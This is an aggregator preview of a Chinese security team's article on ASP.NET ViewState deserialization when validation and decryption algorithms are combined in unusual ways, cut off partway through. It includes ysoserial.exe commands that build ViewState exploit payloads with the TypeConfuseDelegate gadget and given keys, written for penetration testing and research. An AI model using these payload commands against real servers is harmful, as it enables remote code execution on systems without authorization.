专栏名称: 哈拉少安全小队
专注安全研究,漏洞复现,代码审计,python poc/exp脚本开发,经常更新一些最新的漏洞复现,漏洞分析文章,以及脱敏的实战文章。
今天看啥  ›  专栏  ›  哈拉少安全小队

ViewState反序列化-不常见加密组合

哈拉少安全小队  · 公众号  ·  · 2024-09-11 18:29
    

文章预览

0x00 简介 在我们日常渗透活动中,在Web.config或者使用反射会见到几个常见的词: validationalg 、 decryptionalg 、 validationkey 、 decryptionkey 。其中validation是签名算法,decryption为加密解密算法,也就是说如果没有配置decryption那么其实我们的payload发送是明文发送的。 比如使用如下没有配置加密算法的生成 由于我们探究的是.net4框架下的生成,需要指定 generator ,如果是指定apppath和path不加参数islegacy则默认是4.5的算法。 ysoserial . exe - p ViewState - g TypeConfuseDelegate - c "echo 123 > c:\programdata\test.txt" -- generator = "D4124C05" -- validationalg = "HMACSHA256" -- validationkey = "34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF" 配置加密算法的生成 ysoserial . exe - p ViewState - g TypeConfuseDelegate - c "echo 123 > c:\programdata\test.txt" -- generator = "D4124C05" - decryptionalg = "AES" -- decryptionkey = "2F8F78 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览